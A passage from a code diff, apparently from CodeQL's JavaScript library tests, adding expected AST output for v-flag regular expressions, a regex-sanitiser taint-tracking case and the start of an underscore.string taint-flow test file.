[RegExpAlt] abc\|cbd\|dcb | semmle.order | 0 | +| tst.js:2:6:2:16 | [RegExpAlt] abc\|cbd\|dcb | tst.js:2:6:2:8 | [RegExpNormalConstant] abc | semmle.label | 0 | +| tst.js:2:6:2:16 | [RegExpAlt] abc\|cbd\|dcb | tst.js:2:6:2:8 | [RegExpNormalConstant] abc | semmle.order | 0 | +| tst.js:2:6:2:16 | [RegExpAlt] abc\|cbd\|dcb | tst.js:2:10:2:12 | [RegExpNormalConstant] cbd | semmle.label | 1 | +| tst.js:2:6:2:16 | [RegExpAlt] abc\|cbd\|dcb | tst.js:2:10:2:12 | [RegExpNormalConstant] cbd | semmle.order | 1 | +| tst.js:2:6:2:16 | [RegExpAlt] abc\|cbd\|dcb | tst.js:2:14:2:16 | [RegExpNormalConstant] dcb | semmle.label | 2 | +| tst.js:2:6:2:16 | [RegExpAlt] abc\|cbd\|dcb | tst.js:2:14:2:16 | [RegExpNormalConstant] dcb | semmle.order | 2 | +| tst.js:3:1:3:11 | [RegExpLiteral] /[\\q{\\}}]/v | tst.js:3:2:3:9 | [RegExpCharacterClass] [\\q{\\}}] | semmle.label | 0 | +| tst.js:3:1:3:11 | [RegExpLiteral] /[\\q{\\}}]/v | tst.js:3:2:3:9 | [RegExpCharacterClass] [\\q{\\}}] | semmle.order | 0 | +| tst.js:3:1:3:12 | [ExprStmt] /[\\q{\\}}]/v; | tst.js:3:1:3:11 | [RegExpLiteral] /[\\q{\\}}]/v | semmle.label | 1 | +| tst.js:3:1:3:12 | [ExprStmt] /[\\q{\\}}]/v; | tst.js:3:1:3:11 | [RegExpLiteral] /[\\q{\\}}]/v | semmle.order | 1 | +| tst.js:3:2:3:9 | [RegExpCharacterClass] [\\q{\\}}] | tst.js:3:3:3:8 | [RegExpQuotedString] \\q{\\}} | semmle.label | 0 | +| tst.js:3:2:3:9 | [RegExpCharacterClass] [\\q{\\}}] | tst.js:3:3:3:8 | [RegExpQuotedString] \\q{\\}} | semmle.order | 0 | +| tst.js:3:3:3:8 | [RegExpQuotedString] \\q{\\}} | tst.js:3:6:3:7 | [RegExpNormalConstant] \\} | semmle.label | 0 | +| tst.js:3:3:3:8 | [RegExpQuotedString] \\q{\\}} | tst.js:3:6:3:7 | [RegExpNormalConstant] \\} | semmle.order | 0 | +| tst.js:4:1:4:11 | [RegExpLiteral] /[\\q{\\{}]/v | tst.js:4:2:4:9 | [RegExpCharacterClass] [\\q{\\{}] | semmle.label | 0 | +| tst.js:4:1:4:11 | [RegExpLiteral] /[\\q{\\{}]/v | tst.js:4:2:4:9 | [RegExpCharacterClass] [\\q{\\{}] | semmle.order | 0 | +| tst.js:4:1:4:12 | [ExprStmt] /[\\q{\\{}]/v; | tst.js:4:1:4:11 | [RegExpLiteral] /[\\q{\\{}]/v | semmle.label | 1 | +| tst.js:4:1:4:12 | [ExprStmt] /[\\q{\\{}]/v; | tst.js:4:1:4:11 | [RegExpLiteral] /[\\q{\\{}]/v | semmle.order | 1 | +| tst.js:4:2:4:9 | [RegExpCharacterClass] [\\q{\\{}] | tst.js:4:3:4:8 | [RegExpQuotedString] \\q{\\{} | semmle.label | 0 | +| tst.js:4:2:4:9 | [RegExpCharacterClass] [\\q{\\{}] | tst.js:4:3:4:8 | [RegExpQuotedString] \\q{\\{} | semmle.order | 0 | +| tst.js:4:3:4:8 | [RegExpQuotedString] \\q{\\{} | tst.js:4:6:4:7 | [RegExpNormalConstant] \\{ | semmle.label | 0 | +| tst.js:4:3:4:8 | [RegExpQuotedString] \\q{\\{} | tst.js:4:6:4:7 | [RegExpNormalConstant] \\{ | semmle.order | 0 | +| tst.js:5:1:5:18 | [RegExpLiteral] /[\\q{cc\|\\}a\|cc}]/v | tst.js:5:2:5:16 | [RegExpCharacterClass] [\\q{cc\|\\}a\|cc}] | semmle.label | 0 | +| tst.js:5:1:5:18 | [RegExpLiteral] /[\\q{cc\|\\}a\|cc}]/v | tst.js:5:2:5:16 | [RegExpCharacterClass] [\\q{cc\|\\}a\|cc}] | semmle.order | 0 | +| tst.js:5:1:5:19 | [ExprStmt] /[\\q{cc\|\\}a\|cc}]/v; | tst.js:5:1:5:18 | [RegExpLiteral] /[\\q{cc\|\\}a\|cc}]/v | semmle.label | 1 | +| tst.js:5:1:5:19 | [ExprStmt] /[\\q{cc\|\\}a\|cc}]/v; | tst.js:5:1:5:18 | [RegExpLiteral] /[\\q{cc\|\\}a\|cc}]/v | semmle.order | 1 | +| tst.js:5:2:5:16 | [RegExpCharacterClass] [\\q{cc\|\\}a\|cc}] | tst.js:5:3:5:15 | [RegExpQuotedString] \\q{cc\|\\}a\|cc} | semmle.label | 0 | +| tst.js:5:2:5:16 | [RegExpCharacterClass] [\\q{cc\|\\}a\|cc}] | tst.js:5:3:5:15 | [RegExpQuotedString] \\q{cc\|\\}a\|cc} | semmle.order | 0 | +| tst.js:5:3:5:15 | [RegExpQuotedString] \\q{cc\|\\}a\|cc} | tst.js:5:6:5:14 | [RegExpAlt] cc\|\\}a\|cc | semmle.label | 0 | +| tst.js:5:3:5:15 | [RegExpQuotedString] \\q{cc\|\\}a\|cc} | tst.js:5:6:5:14 | [RegExpAlt] cc\|\\}a\|cc | semmle.order | 0 | +| tst.js:5:6:5:14 | [RegExpAlt] cc\|\\}a\|cc | tst.js:5:6:5:7 | [RegExpNormalConstant] cc | semmle.label | 0 | +| tst.js:5:6:5:14 | [RegExpAlt] cc\|\\}a\|cc | tst.js:5:6:5:7 | [RegExpNormalConstant] cc | semmle.order | 0 | +| tst.js:5:6:5:14 | [RegExpAlt] cc\|\\}a\|cc | tst.js:5:9:5:11 | [RegExpNormalConstant] \\}a | semmle.label | 1 | +| tst.js:5:6:5:14 | [RegExpAlt] cc\|\\}a\|cc | tst.js:5:9:5:11 | [RegExpNormalConstant] \\}a | semmle.order | 1 | +| tst.js:5:6:5:14 | [RegExpAlt] cc\|\\}a\|cc | tst.js:5:13:5:14 | [RegExpNormalConstant] cc | semmle.label | 2 | +| tst.js:5:6:5:14 | [RegExpAlt] cc\|\\}a\|cc | tst.js:5:13:5:14 | [RegExpNormalConstant] cc | semmle.order | 2 | +| tst.js:6:1:6:12 | [RegExpLiteral] /[\\qq{a\|b}]/ | tst.js:6:2:6:11 | [RegExpCharacterClass] [\\qq{a\|b}] | semmle.label | 0 | +| tst.js:6:1:6:12 | [RegExpLiteral] /[\\qq{a\|b}]/ | tst.js:6:2:6:11 | [RegExpCharacterClass] [\\qq{a\|b}] | semmle.order | 0 | +| tst.js:6:1:6:13 | [ExprStmt] /[\\qq{a\|b}]/; | tst.js:6:1:6:12 | [RegExpLiteral] /[\\qq{a\|b}]/ | semmle.label | 1 | +| tst.js:6:1:6:13 | [ExprStmt] /[\\qq{a\|b}]/; | tst.js:6:1:6:12 | [RegExpLiteral] /[\\qq{a\|b}]/ | semmle.order | 1 | +| tst.js:6:2:6:11 | [RegExpCharacterClass] [\\qq{a\|b}] | tst.js:6:3:6:4 | [RegExpIdentityEscape] \\q | semmle.label | 0 | +| tst.js:6:2:6:11 | [RegExpCharacterClass] [\\qq{a\|b}] | tst.js:6:3:6:4 | [RegExpIdentityEscape] \\q | semmle.order | 0 | +| tst.js:6:2:6:11 | [RegExpCharacterClass] [\\qq{a\|b}] | tst.js:6:5:6:5 | [RegExpNormalConstant] q | semmle.label | 1 | +| tst.js:6:2:6:11 | [RegExpCharacterClass] [\\qq{a\|b}] | tst.js:6:5:6:5 | [RegExpNormalConstant] q | semmle.order | 1 | +| tst.js:6:2:6:11 | [RegExpCharacterClass] [\\qq{a\|b}] | tst.js:6:6:6:6 | [RegExpNormalConstant] { | semmle.label | 2 | +| tst.js:6:2:6:11 | [RegExpCharacterClass] [\\qq{a\|b}] | tst.js:6:6:6:6 | [RegExpNormalConstant] { | semmle.order | 2 | +| tst.js:6:2:6:11 | [RegExpCharacterClass] [\\qq{a\|b}] | tst.js:6:7:6:7 | [RegExpNormalConstant] a | semmle.label | 3 | +| tst.js:6:2:6:11 | [RegExpCharacterClass] [\\qq{a\|b}] | tst.js:6:7:6:7 | [RegExpNormalConstant] a | semmle.order | 3 | +| tst.js:6:2:6:11 | [RegExpCharacterClass] [\\qq{a\|b}] | tst.js:6:8:6:8 | [RegExpNormalConstant] \| | semmle.label | 4 | +| tst.js:6:2:6:11 | [RegExpCharacterClass] [\\qq{a\|b}] | tst.js:6:8:6:8 | [RegExpNormalConstant] \| | semmle.order | 4 | +| tst.js:6:2:6:11 | [RegExpCharacterClass] [\\qq{a\|b}] | tst.js:6:9:6:9 | [RegExpNormalConstant] b | semmle.label | 5 | +| tst.js:6:2:6:11 | [RegExpCharacterClass] [\\qq{a\|b}] | tst.js:6:9:6:9 | [RegExpNormalConstant] b | semmle.order | 5 | +| tst.js:6:2:6:11 | [RegExpCharacterClass] [\\qq{a\|b}] | tst.js:6:10:6:10 | [RegExpNormalConstant] } | semmle.label | 6 | +| tst.js:6:2:6:11 | [RegExpCharacterClass] [\\qq{a\|b}] | tst.js:6:10:6:10 | [RegExpNormalConstant] } | semmle.order | 6 | +graphProperties +| semmle.graphKind | tree | diff --git a/javascript/ql/test/library-tests/RegExp/VFlagOperations/QuotedString/printAst.ql b/javascript/ql/test/library-tests/RegExp/VFlagOperations/QuotedString/printAst.ql new file mode 100644 index 000000000000..8ceaf83964a3 --- /dev/null +++ b/javascript/ql/test/library-tests/RegExp/VFlagOperations/QuotedString/printAst.ql @@ -0,0 +1 @@ +import semmle.javascript.PrintAst diff --git a/javascript/ql/test/library-tests/RegExp/VFlagOperations/QuotedString/tst.js b/javascript/ql/test/library-tests/RegExp/VFlagOperations/QuotedString/tst.js new file mode 100644 index 000000000000..37f010aacd48 --- /dev/null +++ b/javascript/ql/test/library-tests/RegExp/VFlagOperations/QuotedString/tst.js @@ -0,0 +1,6 @@ +/[\q{abc}]/v; +/[\q{abc|cbd|dcb}]/v; +/[\q{\}}]/v; +/[\q{\{}]/v; +/[\q{cc|\}a|cc}]/v; +/[\qq{a|b}]/; // Since v flag is not present matches 'q{a|b}' diff --git a/javascript/ql/test/library-tests/RegExp/VFlagOperations/Subtraction/printAst.expected b/javascript/ql/test/library-tests/RegExp/VFlagOperations/Subtraction/printAst.expected new file mode 100644 index 000000000000..d2e57f4c1c8e --- /dev/null +++ b/javascript/ql/test/library-tests/RegExp/VFlagOperations/Subtraction/printAst.expected @@ -0,0 +1,103 @@ +nodes +| tst.js:1:1:1:44 | [RegExpLiteral] /[\\p{Script_Extensions=Greek}--\\p{Letter}]/v | semmle.label | [RegExpLiteral] /[\\p{Script_Extensions=Greek}--\\p{Letter}]/v | +| tst.js:1:1:1:45 | [ExprStmt] /[\\p{Sc ... er}]/v; | semmle.label | [ExprStmt] /[\\p{Sc ... er}]/v; | +| tst.js:1:1:1:45 | [ExprStmt] /[\\p{Sc ... er}]/v; | semmle.order | 1 | +| tst.js:1:2:1:42 | [RegExpCharacterClass] [\\p{Script_Extensions=Greek}--\\p{Letter}] | semmle.label | [RegExpCharacterClass] [\\p{Script_Extensions=Greek}--\\p{Letter}] | +| tst.js:1:2:1:42 | [RegExpSubtraction] [\\p{Script_Extensions=Greek}--\\p{Letter}] | semmle.label | [RegExpSubtraction] [\\p{Script_Extensions=Greek}--\\p{Letter}] | +| tst.js:1:3:1:29 | [RegExpUnicodePropertyEscape] \\p{Script_Extensions=Greek} | semmle.label | [RegExpUnicodePropertyEscape] \\p{Script_Extensions=Greek} | +| tst.js:1:32:1:41 | [RegExpUnicodePropertyEscape] \\p{Letter} | semmle.label | [RegExpUnicodePropertyEscape] \\p{Letter} | +| tst.js:2:1:2:17 | [RegExpLiteral] /[[abc]--[cbd]]/v | semmle.label | [RegExpLiteral] /[[abc]--[cbd]]/v | +| tst.js:2:1:2:18 | [ExprStmt] /[[abc]--[cbd]]/v; | semmle.label | [ExprStmt] /[[abc]--[cbd]]/v; | +| tst.js:2:1:2:18 | [ExprStmt] /[[abc]--[cbd]]/v; | semmle.order | 2 | +| tst.js:2:2:2:15 | [RegExpCharacterClass] [[abc]--[cbd]] | semmle.label | [RegExpCharacterClass] [[abc]--[cbd]] | +| tst.js:2:2:2:15 | [RegExpSubtraction] [[abc]--[cbd]] | semmle.label | [RegExpSubtraction] [[abc]--[cbd]] | +| tst.js:2:3:2:7 | [RegExpCharacterClass] [abc] | semmle.label | [RegExpCharacterClass] [abc] | +| tst.js:2:4:2:4 | [RegExpNormalConstant] a | semmle.label | [RegExpNormalConstant] a | +| tst.js:2:5:2:5 | [RegExpNormalConstant] b | semmle.label | [RegExpNormalConstant] b | +| tst.js:2:6:2:6 | [RegExpNormalConstant] c | semmle.label | [RegExpNormalConstant] c | +| tst.js:2:10:2:14 | [RegExpCharacterClass] [cbd] | semmle.label | [RegExpCharacterClass] [cbd] | +| tst.js:2:11:2:11 | [RegExpNormalConstant] c | semmle.label | [RegExpNormalConstant] c | +| tst.js:2:12:2:12 | [RegExpNormalConstant] b | semmle.label | [RegExpNormalConstant] b | +| tst.js:2:13:2:13 | [RegExpNormalConstant] d | semmle.label | [RegExpNormalConstant] d | +| tst.js:3:1:3:24 | [RegExpLiteral] /[[abc]--[cbd]--[bde]]/v | semmle.label | [RegExpLiteral] /[[abc]--[cbd]--[bde]]/v | +| tst.js:3:1:3:25 | [ExprStmt] /[[abc] ... de]]/v; | semmle.label | [ExprStmt] /[[abc] ... de]]/v; | +| tst.js:3:1:3:25 | [ExprStmt] /[[abc] ... de]]/v; | semmle.order | 3 | +| tst.js:3:2:3:22 | [RegExpCharacterClass] [[abc]--[cbd]--[bde]] | semmle.label | [RegExpCharacterClass] [[abc]--[cbd]--[bde]] | +| tst.js:3:2:3:22 | [RegExpSubtraction] [[abc]--[cbd]--[bde]] | semmle.label | [RegExpSubtraction] [[abc]--[cbd]--[bde]] | +| tst.js:3:3:3:7 | [RegExpCharacterClass] [abc] | semmle.label | [RegExpCharacterClass] [abc] | +| tst.js:3:4:3:4 | [RegExpNormalConstant] a | semmle.label | [RegExpNormalConstant] a | +| tst.js:3:5:3:5 | [RegExpNormalConstant] b | semmle.label | [RegExpNormalConstant] b | +| tst.js:3:6:3:6 | [RegExpNormalConstant] c | semmle.label | [RegExpNormalConstant] c | +| tst.js:3:10:3:14 | [RegExpCharacterClass] [cbd] | semmle.label | [RegExpCharacterClass] [cbd] | +| tst.js:3:11:3:11 | [RegExpNormalConstant] c | semmle.label | [RegExpNormalConstant] c | +| tst.js:3:12:3:12 | [RegExpNormalConstant] b | semmle.label | [RegExpNormalConstant] b | +| tst.js:3:13:3:13 | [RegExpNormalConstant] d | semmle.label | [RegExpNormalConstant] d | +| tst.js:3:17:3:21 | [RegExpCharacterClass] [bde] | semmle.label | [RegExpCharacterClass] [bde] | +| tst.js:3:18:3:18 | [RegExpNormalConstant] b | semmle.label | [RegExpNormalConstant] b | +| tst.js:3:19:3:19 | [RegExpNormalConstant] d | semmle.label | [RegExpNormalConstant] d | +| tst.js:3:20:3:20 | [RegExpNormalConstant] e | semmle.label | [RegExpNormalConstant] e | +edges +| tst.js:1:1:1:44 | [RegExpLiteral] /[\\p{Script_Extensions=Greek}--\\p{Letter}]/v | tst.js:1:2:1:42 | [RegExpCharacterClass] [\\p{Script_Extensions=Greek}--\\p{Letter}] | semmle.label | 0 | +| tst.js:1:1:1:44 | [RegExpLiteral] /[\\p{Script_Extensions=Greek}--\\p{Letter}]/v | tst.js:1:2:1:42 | [RegExpCharacterClass] [\\p{Script_Extensions=Greek}--\\p{Letter}] | semmle.order | 0 | +| tst.js:1:1:1:45 | [ExprStmt] /[\\p{Sc ... er}]/v; | tst.js:1:1:1:44 | [RegExpLiteral] /[\\p{Script_Extensions=Greek}--\\p{Letter}]/v | semmle.label | 1 | +| tst.js:1:1:1:45 | [ExprStmt] /[\\p{Sc ... er}]/v; | tst.js:1:1:1:44 | [RegExpLiteral] /[\\p{Script_Extensions=Greek}--\\p{Letter}]/v | semmle.order | 1 | +| tst.js:1:2:1:42 | [RegExpCharacterClass] [\\p{Script_Extensions=Greek}--\\p{Letter}] | tst.js:1:2:1:42 | [RegExpSubtraction] [\\p{Script_Extensions=Greek}--\\p{Letter}] | semmle.label | 0 | +| tst.js:1:2:1:42 | [RegExpCharacterClass] [\\p{Script_Extensions=Greek}--\\p{Letter}] | tst.js:1:2:1:42 | [RegExpSubtraction] [\\p{Script_Extensions=Greek}--\\p{Letter}] | semmle.order | 0 | +| tst.js:1:2:1:42 | [RegExpSubtraction] [\\p{Script_Extensions=Greek}--\\p{Letter}] | tst.js:1:3:1:29 | [RegExpUnicodePropertyEscape] \\p{Script_Extensions=Greek} | semmle.label | 0 | +| tst.js:1:2:1:42 | [RegExpSubtraction] [\\p{Script_Extensions=Greek}--\\p{Letter}] | tst.js:1:3:1:29 | [RegExpUnicodePropertyEscape] \\p{Script_Extensions=Greek} | semmle.order | 0 | +| tst.js:1:2:1:42 | [RegExpSubtraction] [\\p{Script_Extensions=Greek}--\\p{Letter}] | tst.js:1:32:1:41 | [RegExpUnicodePropertyEscape] \\p{Letter} | semmle.label | 1 | +| tst.js:1:2:1:42 | [RegExpSubtraction] [\\p{Script_Extensions=Greek}--\\p{Letter}] | tst.js:1:32:1:41 | [RegExpUnicodePropertyEscape] \\p{Letter} | semmle.order | 1 | +| tst.js:2:1:2:17 | [RegExpLiteral] /[[abc]--[cbd]]/v | tst.js:2:2:2:15 | [RegExpCharacterClass] [[abc]--[cbd]] | semmle.label | 0 | +| tst.js:2:1:2:17 | [RegExpLiteral] /[[abc]--[cbd]]/v | tst.js:2:2:2:15 | [RegExpCharacterClass] [[abc]--[cbd]] | semmle.order | 0 | +| tst.js:2:1:2:18 | [ExprStmt] /[[abc]--[cbd]]/v; | tst.js:2:1:2:17 | [RegExpLiteral] /[[abc]--[cbd]]/v | semmle.label | 1 | +| tst.js:2:1:2:18 | [ExprStmt] /[[abc]--[cbd]]/v; | tst.js:2:1:2:17 | [RegExpLiteral] /[[abc]--[cbd]]/v | semmle.order | 1 | +| tst.js:2:2:2:15 | [RegExpCharacterClass] [[abc]--[cbd]] | tst.js:2:2:2:15 | [RegExpSubtraction] [[abc]--[cbd]] | semmle.label | 0 | +| tst.js:2:2:2:15 | [RegExpCharacterClass] [[abc]--[cbd]] | tst.js:2:2:2:15 | [RegExpSubtraction] [[abc]--[cbd]] | semmle.order | 0 | +| tst.js:2:2:2:15 | [RegExpSubtraction] [[abc]--[cbd]] | tst.js:2:3:2:7 | [RegExpCharacterClass] [abc] | semmle.label | 0 | +| tst.js:2:2:2:15 | [RegExpSubtraction] [[abc]--[cbd]] | tst.js:2:3:2:7 | [RegExpCharacterClass] [abc] | semmle.order | 0 | +| tst.js:2:2:2:15 | [RegExpSubtraction] [[abc]--[cbd]] | tst.js:2:10:2:14 | [RegExpCharacterClass] [cbd] | semmle.label | 1 | +| tst.js:2:2:2:15 | [RegExpSubtraction] [[abc]--[cbd]] | tst.js:2:10:2:14 | [RegExpCharacterClass] [cbd] | semmle.order | 1 | +| tst.js:2:3:2:7 | [RegExpCharacterClass] [abc] | tst.js:2:4:2:4 | [RegExpNormalConstant] a | semmle.label | 0 | +| tst.js:2:3:2:7 | [RegExpCharacterClass] [abc] | tst.js:2:4:2:4 | [RegExpNormalConstant] a | semmle.order | 0 | +| tst.js:2:3:2:7 | [RegExpCharacterClass] [abc] | tst.js:2:5:2:5 | [RegExpNormalConstant] b | semmle.label | 1 | +| tst.js:2:3:2:7 | [RegExpCharacterClass] [abc] | tst.js:2:5:2:5 | [RegExpNormalConstant] b | semmle.order | 1 | +| tst.js:2:3:2:7 | [RegExpCharacterClass] [abc] | tst.js:2:6:2:6 | [RegExpNormalConstant] c | semmle.label | 2 | +| tst.js:2:3:2:7 | [RegExpCharacterClass] [abc] | tst.js:2:6:2:6 | [RegExpNormalConstant] c | semmle.order | 2 | +| tst.js:2:10:2:14 | [RegExpCharacterClass] [cbd] | tst.js:2:11:2:11 | [RegExpNormalConstant] c | semmle.label | 0 | +| tst.js:2:10:2:14 | [RegExpCharacterClass] [cbd] | tst.js:2:11:2:11 | [RegExpNormalConstant] c | semmle.order | 0 | +| tst.js:2:10:2:14 | [RegExpCharacterClass] [cbd] | tst.js:2:12:2:12 | [RegExpNormalConstant] b | semmle.label | 1 | +| tst.js:2:10:2:14 | [RegExpCharacterClass] [cbd] | tst.js:2:12:2:12 | [RegExpNormalConstant] b | semmle.order | 1 | +| tst.js:2:10:2:14 | [RegExpCharacterClass] [cbd] | tst.js:2:13:2:13 | [RegExpNormalConstant] d | semmle.label | 2 | +| tst.js:2:10:2:14 | [RegExpCharacterClass] [cbd] | tst.js:2:13:2:13 | [RegExpNormalConstant] d | semmle.order | 2 | +| tst.js:3:1:3:24 | [RegExpLiteral] /[[abc]--[cbd]--[bde]]/v | tst.js:3:2:3:22 | [RegExpCharacterClass] [[abc]--[cbd]--[bde]] | semmle.label | 0 | +| tst.js:3:1:3:24 | [RegExpLiteral] /[[abc]--[cbd]--[bde]]/v | tst.js:3:2:3:22 | [RegExpCharacterClass] [[abc]--[cbd]--[bde]] | semmle.order | 0 | +| tst.js:3:1:3:25 | [ExprStmt] /[[abc] ... de]]/v; | tst.js:3:1:3:24 | [RegExpLiteral] /[[abc]--[cbd]--[bde]]/v | semmle.label | 1 | +| tst.js:3:1:3:25 | [ExprStmt] /[[abc] ... de]]/v; | tst.js:3:1:3:24 | [RegExpLiteral] /[[abc]--[cbd]--[bde]]/v | semmle.order | 1 | +| tst.js:3:2:3:22 | [RegExpCharacterClass] [[abc]--[cbd]--[bde]] | tst.js:3:2:3:22 | [RegExpSubtraction] [[abc]--[cbd]--[bde]] | semmle.label | 0 | +| tst.js:3:2:3:22 | [RegExpCharacterClass] [[abc]--[cbd]--[bde]] | tst.js:3:2:3:22 | [RegExpSubtraction] [[abc]--[cbd]--[bde]] | semmle.order | 0 | +| tst.js:3:2:3:22 | [RegExpSubtraction] [[abc]--[cbd]--[bde]] | tst.js:3:3:3:7 | [RegExpCharacterClass] [abc] | semmle.label | 0 | +| tst.js:3:2:3:22 | [RegExpSubtraction] [[abc]--[cbd]--[bde]] | tst.js:3:3:3:7 | [RegExpCharacterClass] [abc] | semmle.order | 0 | +| tst.js:3:2:3:22 | [RegExpSubtraction] [[abc]--[cbd]--[bde]] | tst.js:3:10:3:14 | [RegExpCharacterClass] [cbd] | semmle.label | 1 | +| tst.js:3:2:3:22 | [RegExpSubtraction] [[abc]--[cbd]--[bde]] | tst.js:3:10:3:14 | [RegExpCharacterClass] [cbd] | semmle.order | 1 | +| tst.js:3:2:3:22 | [RegExpSubtraction] [[abc]--[cbd]--[bde]] | tst.js:3:17:3:21 | [RegExpCharacterClass] [bde] | semmle.label | 2 | +| tst.js:3:2:3:22 | [RegExpSubtraction] [[abc]--[cbd]--[bde]] | tst.js:3:17:3:21 | [RegExpCharacterClass] [bde] | semmle.order | 2 | +| tst.js:3:3:3:7 | [RegExpCharacterClass] [abc] | tst.js:3:4:3:4 | [RegExpNormalConstant] a | semmle.label | 0 | +| tst.js:3:3:3:7 | [RegExpCharacterClass] [abc] | tst.js:3:4:3:4 | [RegExpNormalConstant] a | semmle.order | 0 | +| tst.js:3:3:3:7 | [RegExpCharacterClass] [abc] | tst.js:3:5:3:5 | [RegExpNormalConstant] b | semmle.label | 1 | +| tst.js:3:3:3:7 | [RegExpCharacterClass] [abc] | tst.js:3:5:3:5 | [RegExpNormalConstant] b | semmle.order | 1 | +| tst.js:3:3:3:7 | [RegExpCharacterClass] [abc] | tst.js:3:6:3:6 | [RegExpNormalConstant] c | semmle.label | 2 | +| tst.js:3:3:3:7 | [RegExpCharacterClass] [abc] | tst.js:3:6:3:6 | [RegExpNormalConstant] c | semmle.order | 2 | +| tst.js:3:10:3:14 | [RegExpCharacterClass] [cbd] | tst.js:3:11:3:11 | [RegExpNormalConstant] c | semmle.label | 0 | +| tst.js:3:10:3:14 | [RegExpCharacterClass] [cbd] | tst.js:3:11:3:11 | [RegExpNormalConstant] c | semmle.order | 0 | +| tst.js:3:10:3:14 | [RegExpCharacterClass] [cbd] | tst.js:3:12:3:12 | [RegExpNormalConstant] b | semmle.label | 1 | +| tst.js:3:10:3:14 | [RegExpCharacterClass] [cbd] | tst.js:3:12:3:12 | [RegExpNormalConstant] b | semmle.order | 1 | +| tst.js:3:10:3:14 | [RegExpCharacterClass] [cbd] | tst.js:3:13:3:13 | [RegExpNormalConstant] d | semmle.label | 2 | +| tst.js:3:10:3:14 | [RegExpCharacterClass] [cbd] | tst.js:3:13:3:13 | [RegExpNormalConstant] d | semmle.order | 2 | +| tst.js:3:17:3:21 | [RegExpCharacterClass] [bde] | tst.js:3:18:3:18 | [RegExpNormalConstant] b | semmle.label | 0 | +| tst.js:3:17:3:21 | [RegExpCharacterClass] [bde] | tst.js:3:18:3:18 | [RegExpNormalConstant] b | semmle.order | 0 | +| tst.js:3:17:3:21 | [RegExpCharacterClass] [bde] | tst.js:3:19:3:19 | [RegExpNormalConstant] d | semmle.label | 1 | +| tst.js:3:17:3:21 | [RegExpCharacterClass] [bde] | tst.js:3:19:3:19 | [RegExpNormalConstant] d | semmle.order | 1 | +| tst.js:3:17:3:21 | [RegExpCharacterClass] [bde] | tst.js:3:20:3:20 | [RegExpNormalConstant] e | semmle.label | 2 | +| tst.js:3:17:3:21 | [RegExpCharacterClass] [bde] | tst.js:3:20:3:20 | [RegExpNormalConstant] e | semmle.order | 2 | +graphProperties +| semmle.graphKind | tree | diff --git a/javascript/ql/test/library-tests/RegExp/VFlagOperations/Subtraction/printAst.ql b/javascript/ql/test/library-tests/RegExp/VFlagOperations/Subtraction/printAst.ql new file mode 100644 index 000000000000..8ceaf83964a3 --- /dev/null +++ b/javascript/ql/test/library-tests/RegExp/VFlagOperations/Subtraction/printAst.ql @@ -0,0 +1 @@ +import semmle.javascript.PrintAst diff --git a/javascript/ql/test/library-tests/RegExp/VFlagOperations/Subtraction/tst.js b/javascript/ql/test/library-tests/RegExp/VFlagOperations/Subtraction/tst.js new file mode 100644 index 000000000000..918375fb911c --- /dev/null +++ b/javascript/ql/test/library-tests/RegExp/VFlagOperations/Subtraction/tst.js @@ -0,0 +1,3 @@ +/[\p{Script_Extensions=Greek}--\p{Letter}]/v; +/[[abc]--[cbd]]/v; +/[[abc]--[cbd]--[bde]]/v; diff --git a/javascript/ql/test/library-tests/TaintTracking/BasicTaintTracking.expected b/javascript/ql/test/library-tests/TaintTracking/BasicTaintTracking.expected index d8ba7545b0d2..4a0575eb73e1 100644 --- a/javascript/ql/test/library-tests/TaintTracking/BasicTaintTracking.expected +++ b/javascript/ql/test/library-tests/TaintTracking/BasicTaintTracking.expected @@ -238,6 +238,7 @@ flow | promise.js:18:22:18:29 | source() | promise.js:24:10:24:10 | e | | promise.js:33:21:33:28 | source() | promise.js:38:10:38:10 | e | | promise.js:43:20:43:27 | source() | promise.js:43:8:43:28 | Promise ... urce()) | +| regexp-sanitiser.js:2:19:2:26 | source() | regexp-sanitiser.js:4:14:4:18 | taint | | rxjs.js:3:1:3:8 | source() | rxjs.js:10:14:10:17 | data | | rxjs.js:13:1:13:8 | source() | rxjs.js:17:23:17:23 | x | | rxjs.js:13:1:13:8 | source() | rxjs.js:18:23:18:23 | x | diff --git a/javascript/ql/test/library-tests/TaintTracking/DataFlowTracking.expected b/javascript/ql/test/library-tests/TaintTracking/DataFlowTracking.expected index 42595adc131b..6335d6dbd49a 100644 --- a/javascript/ql/test/library-tests/TaintTracking/DataFlowTracking.expected +++ b/javascript/ql/test/library-tests/TaintTracking/DataFlowTracking.expected @@ -161,6 +161,7 @@ flow | partialCalls.js:4:17:4:24 | source() | partialCalls.js:30:14:30:20 | x.value | | partialCalls.js:4:17:4:24 | source() | partialCalls.js:41:10:41:18 | id(taint) | | partialCalls.js:4:17:4:24 | source() | partialCalls.js:51:14:51:14 | x | +| regexp-sanitiser.js:2:19:2:26 | source() | regexp-sanitiser.js:4:14:4:18 | taint | | sanitizer-function.js:12:17:12:24 | source() | sanitizer-function.js:14:10:14:14 | taint | | sanitizer-function.js:12:17:12:24 | source() | sanitizer-function.js:17:14:17:18 | taint | | sanitizer-function.js:12:17:12:24 | source() | sanitizer-function.js:21:14:21:18 | taint | diff --git a/javascript/ql/test/library-tests/TaintTracking/regexp-sanitiser.js b/javascript/ql/test/library-tests/TaintTracking/regexp-sanitiser.js new file mode 100644 index 000000000000..67481589bb62 --- /dev/null +++ b/javascript/ql/test/library-tests/TaintTracking/regexp-sanitiser.js @@ -0,0 +1,6 @@ +function foo() { + const taint = source(); + if (/^asd[\s\S]*$/.test(taint)) { + sink(taint); // NOT OK + } +} diff --git a/javascript/ql/test/library-tests/TripleDot/underscore.string.js b/javascript/ql/test/library-tests/TripleDot/underscore.string.js new file mode 100644 index 000000000000..07f186343ce2 --- /dev/null +++ b/javascript/ql/test/library-tests/TripleDot/underscore.string.js @@ -0,0 +1,130 @@ +var s = require("underscore.string"); + +function strToStr() { + sink(s.slugify(source("s1"))); // $ hasTaintFlow=s1 + sink(s.capitalize(source("s2"))); // $ hasTaintFlow=s2 + sink(s.decapitalize(source("s3"))); // $ hasTaintFlow=s3 + sink(s.clean(source("s4"))); // $ hasTaintFlow=s4 + sink(s.cleanDiacritics(source("s5"))); // $ hasTaintFlow=s5 + sink(s.swapCase(source("s6"))); // $ hasTaintFlow=s6 + sink(s.escapeHTML(source("s7"))); // $ hasTaintFlow=s7 + sink(s.unescapeHTML(source("s8"))); // $ hasTaintFlow=s8 + sink(s.wrap(source("s9"), {})); // $ hasTaintFlow=s9 + sink(s.dedent(source("s10"), " ")); // $ hasTaintFlow=s10 + sink(s.reverse(source("s11"))); // $ hasTaintFlow=s11 + 